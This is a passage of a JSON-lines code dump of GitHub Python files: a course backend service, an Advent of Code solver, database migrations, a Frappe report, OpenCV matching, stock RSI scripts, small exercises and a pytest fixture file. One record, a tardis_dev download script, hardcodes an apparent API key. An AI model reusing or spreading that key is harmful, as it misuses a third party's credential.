id).first()\n 
lesson.status = False\n        self.db.commit()\n        return\n\n    def delete_lesson(self, id:int):\n        self.db.query(LessonModel).filter(LessonModel.id == id).delete()\n        self.db.commit()\n        return\n","repo_name":"programateacademy/cuyeca-course-manege-backend","sub_path":"services/lesson.py","file_name":"lesson.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"14673458448","text":"\nclass file:\n    def __init__(self, name, size):\n        self.name = name\n        self.size = size\n    def __repr__(self):\n        # __repr__ must return a string, not print one\n        return f\"{self.size} {self.name}\"\n\nclass dir:\n    def __init__(self, name, parent=None):\n        self.name = name\n        self.parent = parent\n        self.dirs = dict()\n        self.files = list()\n        self._size = None\n    def size(self):\n        if self._size is None: # memoize\n            self._size = sum(file.size for file in self.files) + sum(\n                self.dirs[dir].size() for dir in self.dirs\n            )\n        return self._size\n    def make_dir(self, subdir):\n        if subdir not in self.dirs:\n            self.dirs[subdir] = dir(subdir, self)\n        return self.dirs[subdir]\n    def add_file(self, filename, size):\n        self.files.append(file(filename, size))\n    def path(self):\n        parts = list()\n        current = self\n        while current is not None:\n            parts.append(current.name)\n            current = current.parent\n        return \"/\".join(reversed(parts))\n    def root(self):\n        current = self\n        while current.parent is not None:\n            current = current.parent\n        return current\n    def dfs(self, v):\n        for dir in self.dirs.values():\n            result = dir.dfs(v)\n            if result is not None:\n                return result\n        return self if v(self) else None\n\ndef main(stream, opts):\n    cwd = root = dir(\"\")\n    line = stream.readline()\n    while line:\n        if line[0] != \"$\": # command\n            raise RuntimeError(f\"expected command, not {line[:-1]!r}\")\n        cmd = line[2:4]\n        if opts.verbose:\n            print(\"$\", cmd)\n        if cmd == \"cd\": # change dir\n            path = line[5:-1] # strip newline\n            if path == \"..\":\n                cwd = cwd.parent\n            elif path == \"/\":\n                cwd = root\n            else:\n                cwd = cwd.make_dir(path)\n            line = stream.readline()\n        elif cmd == \"ls\": # list\n            line = stream.readline()\n            while line:\n                if line.startswith(\"dir \"):\n                    cwd.make_dir(line[4:].rstrip()) # use the listed name, not the stale cd argument\n                elif line[0] == \"$\":\n                    break\n                else:\n                    size, name = line.split(None, 1)\n                    cwd.add_file(name.rstrip(), int(size))\n                line = stream.readline()\n        else:\n            raise RuntimeError(f\"unsupported command {cmd!r}\")\n\n    p1sum = [0]\n    def visit(d):\n        if d.size() <= 100000:\n            p1sum[0] += d.size()\n    root.dfs(visit)\n    print(\"part 1:\", p1sum[0])\n\n    total_space = 70000000\n    free_target = 30000000\n    free_current = (total_space - root.size())\n    need_freed = free_target - free_current\n    print(f\"need to free {need_freed}\")\n    best_removal = [root]\n    def visit(d):\n        if d.size() >= need_freed and d.size() < best_removal[0].size():\n            if opts.verbose:\n                print(f\"{d.name}, size={d.size()} >= need_freed {need_freed}?\")\n            best_removal[0] = d\n    root.dfs(visit)\n    best_removal = best_removal[0]\n    print(\"part 2:\", best_removal.name, best_removal.size())\n","repo_name":"fritzr/advent2022","sub_path":"src/advent2022/day07/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
{"seq_id":"40704800854","text":"\"\"\"init\n\nRevision ID: e46dc3f1cd7b\nRevises:\nCreate Date: 2023-04-25 12:39:18.269715\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"e46dc3f1cd7b\"\ndown_revision 
= None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table(\n        \"metricsunit\",\n        sa.Column(\"id\", sa.Integer(), nullable=True),\n        sa.Column(\"service_name\", sqlmodel.sql.sqltypes.AutoString(), nullable=False),\n        sa.Column(\"path\", sqlmodel.sql.sqltypes.AutoString(), nullable=False),\n        sa.Column(\"response_time_ms\", sa.Integer(), nullable=False),\n        sa.PrimaryKeyConstraint(\"id\"),\n    )\n    op.create_index(op.f(\"ix_metricsunit_path\"), \"metricsunit\", [\"path\"], unique=False)\n    op.create_index(op.f(\"ix_metricsunit_service_name\"), \"metricsunit\", [\"service_name\"], unique=False)\n    # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index(op.f(\"ix_metricsunit_service_name\"), table_name=\"metricsunit\")\n    op.drop_index(op.f(\"ix_metricsunit_path\"), table_name=\"metricsunit\")\n    op.drop_table(\"metricsunit\")\n    # ### end Alembic commands ###\n","repo_name":"CAREEMER/monitoring-test-task","sub_path":"src/migrations/versions/e46dc3f1cd7b_init.py","file_name":"e46dc3f1cd7b_init.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"36282230955","text":"import frappe\nfrom frappe import _\n\ndef execute(filters=None):\n\tcolumns, data = get_columns(), get_data(filters)\n\treturn columns, data\ndef get_data(filters):\n\tvolunteer = filters.get('volunteer')\n\t# parameterized query; interpolating the filter directly would allow SQL injection\n\tdata = frappe.db.sql(\"\"\"\n\n\t\tselect \n\t\temployee,\n\t\n\t\temployee_name ,\n\t\t\t\t\t\t\n\t\tdepartment,\n\t\tdesignation,\n\t\tcell_number,\n\t\n\t\t\n\t\tamount\n\n\t\tfrom `tabEmployee`\n\n\t\twhere volunteer = %(volunteer)s\n\t\n\t\n\t\"\"\", {\"volunteer\": volunteer}, as_dict=1)\n\n\n\treturn data \ndef get_columns():\n\tcolumns = [\n\t\t{\n\t\t\t\"label\": _(\"ID\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"employee\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\t\n\t\t{\n\t\t\t\"label\": _(\"Name\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"employee_name\",\n\t\t\t\n\t\t\t\"width\": 250,\n\t\t},\n\t\t\n\t\t\n\t\t# {\n\t\t# \t\"label\": _(\"Department\"),\n\t\t# \t\"fieldtype\": \"Data\",\n\t\t# \t\"fieldname\": \"department\",\n\t\t\t\n\t\t# \t\"width\": 200,\n\t\t# },\n\n\t\t{\n\t\t\t\"label\": _(\"Designation\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"designation\",\n\t\t\t\n\t\t\t\"width\": 200,\n\t\t},\n\n\t\t{\n\t\t\t\"label\": _(\"Mobile\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"cell_number\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\n\t\n\n\n\t\n\n\t\t{\n\t\t\t\"label\": _(\"Salary\"),\n\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\"fieldname\": \"amount\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\n\n\t\n\t\n\t]\n\treturn columns\n","repo_name":"xakiin66/rasiin_hr","sub_path":"rasiin_hr/rasiin_hr/report/employee_list/employee_list.py","file_name":"employee_list.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"42668169900","text":"import cv2\nimport numpy as np\n\n# Ler as duas imagens :\nimg1 = cv2.imread('solo.jpg', cv2.IMREAD_GRAYSCALE)\nimg2 = cv2.imread('analysis.jpg', cv2.IMREAD_GRAYSCALE)\n\n# Orb:\norb = cv2.ORB_create()\nkp1, desc1 = orb.detectAndCompute(img1, None)\nkp2, desc2 = orb.detectAndCompute(img2, None)\n\n# Matches:\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, 
crossCheck=True)\nmatches = bf.match(desc1, desc2)\nmatches = sorted(matches, key = lambda x:x.distance)\n\n\n# Desenhar pontos correspondentes:\nmatching_result = cv2.drawMatches(img1, kp1, img2, kp2, matches[:50], None, flags=2)\n\n#for m in matches:\n   # print(m.distance)\n\n  # print(len(matches))\n   \n#for d in desc1:\n#print(d)\n\n# Exibir imagens tratadas:\ncv2.imwrite('img1.jpg', img1)\ncv2.imwrite('img2.jpg', img2)\ncv2.imwrite('mat_res.jpg', matching_result)","repo_name":"caduleite/computacao-grafica","sub_path":"Reconhecimento imagens.py","file_name":"Reconhecimento imagens.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"15634963875","text":"weather_c = {\n    \"Monday\": 12,\n    \"Tuesday\": 14,\n    \"Wednesday\": 15,\n    \"Thursday\": 14,\n    \"Friday\": 21,\n    \"Saturday\": 22,\n    \"Sunday\": 24,\n}\n# 🚨 Don't change code above 👆\n# for my in weather_c:\n#     print(my,weather_c[my])\n# Write your code 👇 below:\nweather_f = {my: weather_c[my] * 9 / 5 + 32 for my in weather_c}\n\nprint(weather_f)\n","repo_name":"Victorchiemeka/100-Days-Of-Python","sub_path":"Day26-list-comprehension/excirise.py","file_name":"excirise.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"38940629014","text":"import yfinance as yf, pandas as pd, shutil, os, time, glob\n#----------------------------------------------------RSI CALCULATION----------------------------------------------\n# Get the path for each stock file in a list\nlist_files = (glob.glob(\"B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data\\\\*RSI*\"))\n# You can use this line to limit the analysis to a portion of the stocks in the \"stocks folder\"\n# list_files = list_files[:1]\n# Create the dataframe that we will be adding the final analysis of each stock to\nCompare_Stocks = pd.DataFrame(columns=[\"Company\", \"RSI_DAILY\", \"RSI_WEEKLY\", \"RSI_Monthly\",\"RSI-Strength W-M\",\"RSI-Strength D-W\",\"RSI Diff W-M\",\"RSI Diff D-W\"])\n# Loop through the stock paths\nfor stock in list_files:\n    # Dataframe to hold the historical data of the stock we are interested in.\n    Hist_data = pd.read_csv(stock)\n    Company = ((os.path.basename(stock)).split(\".NS_RSI.csv\")[0]) # Name of the company\n    try:\n        Hist_data_W = pd.read_csv('B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data_W\\\\'+Company+ '.NS_RSI.csv')\n        Hist_data_M = pd.read_csv('B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data_M\\\\'+Company+ '.NS_RSI.csv')\n    except FileNotFoundError:\n        print('File not found '+Company) \n        continue # skip this stock; the reads below would otherwise use missing data\n    last_line = Hist_data.iloc[len(Hist_data)-1,6]\n    last_line_W = Hist_data_W.iloc[len(Hist_data_W)-1,6]\n    last_line_M = Hist_data_M.iloc[len(Hist_data_M)-1,6]\n    add_row = {'Company' : Company,'RSI_DAILY' : last_line, 'RSI_WEEKLY' : last_line_W, 'RSI_Monthly' : last_line_M ,\"RSI-Strength W-M\" : (last_line_W-last_line_M)+last_line_W,\"RSI-Strength D-W\" :(last_line-last_line_W)+last_line,\"RSI Diff W-M\" : (last_line_W-last_line_M) ,\"RSI Diff D-W\":(last_line-last_line_W)}\n    Compare_Stocks = Compare_Stocks.append(add_row, ignore_index = True) # Add the analysis on the stock to the existing Compare_Stocks dataframe\nCompare_Stocks.to_csv(\"B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\RSI_GET_ALL_TEST.csv\", index = False) # Save the compiled data on each stock to a csv 
\n","repo_name":"sanjayrgaikwad/python","sub_path":"src/RSI/RSI_Calc_For_Each_Stock_W_M.py","file_name":"RSI_Calc_For_Each_Stock_W_M.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4815116858","text":"#1 ask user for pet name, store it in a variable\npet_name = input('enter your pet name:')\n#2 use fn to get pet name length, store length in a new variable\npet_name_length = len(pet_name)\n#3 validate - if-elif to print error messages if len is outside boundaries\nif(pet_name_length == 0):\n print(\"you must enter something\")\nelif(pet_name_length <2):\n print(\"Your pet must have a name with more than 2 letters\")\nelif(pet_name_length >= 20):\n print(\"Enter a name that is less than or equal to 20 letters\")\n\n","repo_name":"natasha960506/Computer_science","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28314329901","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n # N : 화덕의 크기 N 개의 피자를 동시에 구울 수 있음\n # M : 구워야 하는 피자의 수\n N, M = map(int, input().split())\n cheese = list(map(int, input().split()))\n\n # 반복문 안에서 일단 N 이 허용하는 만큼의 피자를 넣을 것이다\n # 각각의 피자는 치즈의양이 다르고 한바퀴씩 돌때 2분의 1로 줄어들며 정수값만 남긴다\n # 치즈가 다 녹은 피자는 꺼내고 아직 넣지 않은 피자를 넣는다\n # 이런 방식으로 피자를 구웠을때, 가장 마지막까지 남아있는 피자 번호를 알아내자\n # 피자에 번호를 매겨야한다? enumerate()을 활용해야하나 고민\n \n","repo_name":"junhyukM/algo","sub_path":"swea/queue/5099_피자굽기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43469881549","text":"from tardis_dev import datasets\n\ndef download(start_time, end_date):\n datasets.download(\n exchange=\"bybit\",\n data_types=[\n \"quotes\",\n \"liquidations\",\n \"derivative_ticker\",\n \"trades\"\n ],\n from_date=start_time,\n to_date=end_date,\n symbols=[\"BTCUSD\"],\n api_key=\"TD.9wkdm9sOpHKRn5zV.YN9Bl-Hd8Q9DfO7.g0zG3MmyiXpVEb9.U9iW0oOPu0HTaSa.gbTdYT7GV8tTc7B.NSzm\")\n\n#Example Download\ndownload(\"2022-01-02\", \"2022-04-01\") \n\n","repo_name":"Ruch-droid/crypto","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"41720905415","text":"from turtle import Turtle\r\n\r\n\r\nclass Brick(Turtle):\r\n def __init__(self, xcord, ycord, color):\r\n super().__init__()\r\n self.speed(\"fastest\")\r\n self.shape(\"square\")\r\n self.shapesize(.6, 2)\r\n self.color(color)\r\n self.penup()\r\n self.goto(xcord, ycord)","repo_name":"Jared-Glenn/100-Days-of-Python","sub_path":"Days 76-100/086_breakout_game/brick.py","file_name":"brick.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21167365931","text":"import pytest\nimport py.path\nimport tempfile\nfrom ce import get_app\nfrom datetime import datetime\nfrom pkg_resources import resource_filename\nfrom dateutil.relativedelta import relativedelta\n\nfrom modelmeta.v2 import (\n metadata,\n Ensemble,\n Emission,\n Model,\n Run,\n VariableAlias,\n Grid,\n Time,\n TimeSet,\n ClimatologicalTime,\n DataFile,\n DataFileVariableGridded,\n)\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .mock_data import geoserver_data, 
tasmin_data, tasmax_data\n\n\n@pytest.fixture\ndef mock_thredds_url_root(monkeypatch):\n monkeypatch.setenv(\n \"THREDDS_URL_ROOT\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/dodsC/datasets\",\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef ce_response():\n return {\n \"test_period_20100101-20391230\": {\"mean\": 1, \"min\": 0, \"max\": 2},\n \"test_period_20400101-20691231\": {\"mean\": 3, \"min\": 1, \"max\": 5},\n \"test_period_20700101-20991231\": {\"mean\": 5, \"min\": 0, \"max\": 10},\n }\n\n\n@pytest.fixture(scope=\"function\")\ndef sessiondir(request,):\n dir = py.path.local(tempfile.mkdtemp())\n request.addfinalizer(lambda: dir.remove(rec=1))\n return dir\n\n\n@pytest.fixture(scope=\"function\")\ndef dsn(sessiondir,):\n return \"sqlite:///{}\".format(sessiondir.join(\"test.sqlite\").realpath())\n\n\n@pytest.fixture\ndef app(dsn,):\n app = get_app()\n app.config[\"TESTING\"] = True\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = dsn\n app.config[\"SQLALCHEMY_ECHO\"] = False\n return app\n\n\n@pytest.fixture\ndef cleandb(app,):\n db = SQLAlchemy(app)\n metadata.create_all(bind=db.engine)\n db.create_all()\n return db\n\n\n@pytest.fixture\ndef populateddb(cleandb,):\n\n now = datetime.utcnow()\n\n populateable_db = cleandb\n sesh = populateable_db.session\n\n # Ensembles\n\n p2a_rules = Ensemble(name=\"p2a_rules\", version=1.0, changes=\"\", description=\"\")\n ensembles = [\n p2a_rules,\n ]\n\n # Emissions\n historical = Emission(short_name=\"historical\")\n historical_rcp85 = Emission(short_name=\"historical,rcp85\")\n\n # Runs\n run1 = Run(name=\"r1i1p1\", emission=historical)\n run2 = Run(name=\"r1i1p1\", emission=historical_rcp85)\n\n # Models\n\n bnu = Model(short_name=\"BNU-ESM\", type=\"GCM\", runs=[run1], organization=\"BNU\")\n anusplin = Model(short_name=\"anusplin\", type=\"GCM\", runs=[run1], organization=\"\")\n canesm2 = Model(short_name=\"CanESM2\", type=\"GCM\", runs=[run2], organization=\"\")\n models = [bnu, anusplin, canesm2]\n\n # Data files\n\n def make_data_file(\n filename=None, run=None,\n ):\n if not filename.startswith(\"/\"):\n filename = resource_filename(\"ce\", \"tests/data/{}\".format(filename))\n return DataFile(\n filename=filename,\n unique_id=filename,\n first_1mib_md5sum=\"xxxx\",\n x_dim_name=\"lon\",\n y_dim_name=\"lat\",\n index_time=now,\n run=run,\n )\n\n df_bnu_seasonal = make_data_file(\n filename=\"tasmin_sClim_BNU-ESM_historical_r1i1p1_19650101-19701230.nc\",\n run=run1,\n ) # Only local file (only used to test file collector). 
All other files from THREDDS.\n\n storage_root_anusplin = (\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n )\n storage_root_canesm2 = \"/storage/data/projects/comp_support/climate_explorer_data_prep/climatological_means/downscale/output/\"\n canesm2_tasmin_root = storage_root_canesm2 + \"2433/\"\n canesm2_tasmax_root = storage_root_canesm2 + \"2495/\"\n\n df_anusplin_tasmin_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"tasmin_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmax_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"tasmax_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmin_mon = make_data_file(\n filename=storage_root_anusplin\n + \"tasmin_mClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmax_mon = make_data_file(\n filename=storage_root_anusplin\n + \"tasmax_mClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_pr_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"pr_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_canesm2_tasmin_2050_seasonal = make_data_file(\n filename=canesm2_tasmin_root\n + \"tasmin_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20400101-20691231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmax_2050_seasonal = make_data_file(\n filename=canesm2_tasmax_root\n + \"tasmax_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20400101-20691231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmin_2080_seasonal = make_data_file(\n filename=canesm2_tasmin_root\n + \"tasmin_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20700101-20991231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmax_2080_seasonal = make_data_file(\n filename=canesm2_tasmax_root\n + \"tasmax_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20700101-20991231_Canada.nc\",\n run=run2,\n )\n data_files = [v for k, v in locals().items() if k.startswith(\"df\")]\n\n # VariableAlias\n\n tasmin = VariableAlias(\n long_name=\"Daily Minimum Temperature\",\n standard_name=\"air_temperature\",\n units=\"degC\",\n )\n tasmax = VariableAlias(\n long_name=\"Daily Maximum Temperature\",\n standard_name=\"air_temperature\",\n units=\"degC\",\n )\n pr = VariableAlias(\n long_name=\"Precipitation\",\n standard_name=\"precipitation_flux\",\n units=\"kg d-1 m-2\",\n )\n flow_direction = VariableAlias(\n long_name=\"Flow Direction\", standard_name=\"flow_direction\", units=\"1\",\n )\n variable_aliases = [\n tasmin,\n tasmax,\n pr,\n flow_direction,\n ]\n\n # Grids\n\n grid_anuspline = Grid(\n name=\"Canada ANUSPLINE\",\n xc_grid_step=0.0833333,\n yc_grid_step=0.0833333,\n xc_origin=-140.958,\n yc_origin=41.0417,\n xc_count=1068,\n yc_count=510,\n xc_units=\"degrees_east\",\n yc_units=\"degrees_north\",\n evenly_spaced_y=True,\n )\n grids = [grid_anuspline]\n\n # Add all the above\n\n sesh.add_all(ensembles)\n sesh.add_all(models)\n sesh.add_all(data_files)\n sesh.add_all(variable_aliases)\n sesh.add_all(grids)\n sesh.flush()\n\n # DataFileVariable\n\n def make_data_file_variable(\n file, cell_methods, var_name=None, grid=grid_anuspline,\n ):\n var_name_to_alias = {\n \"tasmin\": tasmin,\n \"tasmax\": tasmax,\n \"pr\": pr,\n \"flow_direction\": flow_direction,\n }[var_name]\n return DataFileVariableGridded(\n file=file,\n netcdf_variable_name=var_name,\n range_min=0,\n range_max=50,\n variable_alias=var_name_to_alias,\n grid=grid,\n variable_cell_methods=cell_methods,\n )\n\n tmax_bnu = 
make_data_file_variable(\n df_bnu_seasonal, cell_methods=\"time: maximum\", var_name=\"tasmin\",\n )\n tmin_anusplin_seasonal = make_data_file_variable(\n df_anusplin_tasmin_seasonal,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmin\",\n )\n tmax_anusplin_seasonal = make_data_file_variable(\n df_anusplin_tasmax_seasonal,\n cell_methods=\"time: maximum time: mean over days\",\n var_name=\"tasmax\",\n )\n tmin_anusplin_mon = make_data_file_variable(\n df_anusplin_tasmin_mon,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmin\",\n )\n tmax_anusplin_mon = make_data_file_variable(\n df_anusplin_tasmax_mon,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmax\",\n )\n pr_anusplin = make_data_file_variable(\n df_anusplin_pr_seasonal,\n cell_methods=\"time: mean time: mean over days\",\n var_name=\"pr\",\n )\n tmin_canesm2_2050 = make_data_file_variable(\n df_canesm2_tasmin_2050_seasonal,\n cell_methods=\"time: minimum\",\n var_name=\"tasmin\",\n )\n tmax_canesm2_2050 = make_data_file_variable(\n df_canesm2_tasmax_2050_seasonal,\n cell_methods=\"time: maximum\",\n var_name=\"tasmax\",\n )\n tmin_canesm2_2080 = make_data_file_variable(\n df_canesm2_tasmin_2080_seasonal,\n cell_methods=\"time: minimum\",\n var_name=\"tasmin\",\n )\n tmax_canesm2_2080 = make_data_file_variable(\n df_canesm2_tasmax_2080_seasonal,\n cell_methods=\"time: maximum\",\n var_name=\"tasmax\",\n )\n var_names = (\"tmin\", \"tmax\")\n data_file_variables = [\n v for k, v in locals().items() if k.startswith(var_names)\n ] + [pr_anusplin]\n\n sesh.add_all(data_file_variables)\n sesh.flush()\n\n # Associate to Ensembles\n\n for dfv in data_file_variables:\n p2a_rules.data_file_variables.append(dfv)\n sesh.add_all(sesh.dirty)\n\n # TimeSets\n\n ts_hist_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(1971, 1, 1),\n end_date=datetime(2000, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(time_idx=i, timestep=datetime(1986, 3 * i + 1, 16)) for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(1971, 3 * i + 1, 1) - relativedelta(months=1),\n time_end=datetime(2000, 3 * i + 1, 1) + relativedelta(months=2),\n )\n for i in range(4)\n ],\n )\n ts_hist_mon = TimeSet(\n calendar=\"standard\",\n start_date=datetime(1971, 1, 1),\n end_date=datetime(2000, 12, 31),\n multi_year_mean=True,\n num_times=12,\n time_resolution=\"monthly\",\n times=[Time(time_idx=i, timestep=datetime(1986, i + 1, 15)) for i in range(12)],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(1971, i + 1, 1),\n time_end=datetime(2000, i + 1, 1) + relativedelta(months=1),\n )\n for i in range(12)\n ],\n )\n ts_2050_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(2040, 1, 1),\n end_date=datetime(2069, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(\n time_idx=i,\n timestep=datetime(2054, 11, 27) + relativedelta(months=3 * i),\n )\n for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(2040, 3 * i + 1, 16) - relativedelta(months=1),\n time_end=datetime(2069, 3 * i + 1, 6),\n )\n for i in range(4)\n ],\n )\n ts_2080_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(2070, 1, 1),\n end_date=datetime(2099, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(\n time_idx=i,\n 
timestep=datetime(2084, 11, 19) + relativedelta(months=3 * i),\n )\n for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(2070, 3 * i + 1, 8) - relativedelta(months=3),\n time_end=datetime(2099, 3 * i + 1, 1),\n )\n for i in range(4)\n ],\n )\n ts_hist_seasonal.files = [\n df_bnu_seasonal,\n df_anusplin_tasmin_seasonal,\n df_anusplin_tasmax_seasonal,\n df_anusplin_pr_seasonal,\n ]\n ts_hist_mon.files = [df_anusplin_tasmin_mon, df_anusplin_tasmax_mon]\n ts_2050_seasonal.files = [\n df_canesm2_tasmin_2050_seasonal,\n df_canesm2_tasmax_2050_seasonal,\n ]\n ts_2080_seasonal.files = [\n df_canesm2_tasmin_2080_seasonal,\n df_canesm2_tasmax_2080_seasonal,\n ]\n sesh.add_all(sesh.dirty)\n\n sesh.commit()\n return populateable_db\n\n\n@pytest.fixture()\ndef mock_urls(requests_mock):\n requests_mock.register_uri(\n \"GET\",\n \"http://docker-dev01.pcic.uvic.ca:30123/geoserver/bc_regions/ows\",\n content=geoserver_data,\n )\n requests_mock.register_uri(\n \"GET\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/fileServer/datasets\"\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n \"tasmin_sClimMean_anusplin_historical_19710101-20001231.nc\",\n content=tasmin_data,\n )\n requests_mock.register_uri(\n \"GET\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/fileServer/datasets\"\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n \"tasmax_sClimMean_anusplin_historical_19710101-20001231.nc\",\n content=tasmax_data,\n )\n","repo_name":"pacificclimate/p2a-rule-engine","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72610873032","text":"# 2/26/2023\n# ---SoloLearn---\n\"\"\"\nWriting Files\n\nTo write to files you use the write method.\nThis will create a new file called \"newfile.txt\" and write the content to it.\n\nIn case the file already exists, its entire content will be replaced when you open it in write mode using \"w\".\n\"\"\"\n\nfile = open(\"newfile.txt\", \"w\")\nfile.write(\"This has been written to a file\")\nfile.close()\n\n'''\nIf you want to add content to an existing file, you can open it using the \"a\" mode, which stand for \n\"append\": \n'''\nfile = open(\"newfile.txt\", \"a\")\n\nfile.write(\"\\nThe Da Vinci Code\")\nfile.close()\n\n'''\nThe write method returns the number of bytes written to a file, if successful.\n'''\nmsg = \"Hello world!\"\nfile = open(\"newfile.txt\", \"w\")\namount_written = file.write(msg)\nprint(amount_written)\nfile.close()\n\n'''\nTake a number N as input and write the numbers 1 to N to the file \"numbers.txt\", each number on a \nseparate line.\n'''\nn = int(input())\n\nfile = open(\"numbers.txt\", \"w+\")\nfor i in range(1, n+1):\n file.write(str(i))\n file.write(\"\\n\")\n\nfile.close()\n\nf = open(\"numbers.txt\", \"r\")\nprint(f.read())\nf.close()","repo_name":"blazenkd/Training","sub_path":"Fundamentals/Python/Files/writing_files.py","file_name":"writing_files.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72537799431","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 18:07:06 2019\n\n@author: kaany\n\"\"\"\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nimport 
